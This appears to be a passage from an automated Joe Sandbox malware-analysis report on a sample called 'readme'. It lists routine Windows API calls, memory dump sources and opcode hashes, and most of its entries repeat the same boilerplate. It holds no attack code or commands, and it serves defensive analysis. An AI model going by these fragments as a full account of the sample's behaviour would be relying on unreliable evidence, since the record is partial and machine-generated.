                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                          • API String ID: 823142352-4282027825
                                                                                                                                                                                                          • Opcode ID: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                          • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                                                                          • Opcode Fuzzy Hash: daeb41911831d80bc6e531fad3d0e57e46336e4ff8e700678b0c9ea4e3aad5f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                                                                            • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,7772E820,?,004DD732), ref: 004FA76A
                                                                                                                                                                                                            • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                                                                            • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                                                                            • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                          • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                          • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Long$Create
                                                                                                                                                                                                          • String ID: Dummy$STATIC
                                                                                                                                                                                                          • API String ID: 1733017098-132613206
                                                                                                                                                                                                          • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                          • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                          • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1404962471-0
                                                                                                                                                                                                          • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                          • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1430435781-0
                                                                                                                                                                                                          • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                          • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                          • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3777265051-0
                                                                                                                                                                                                          • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                          • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
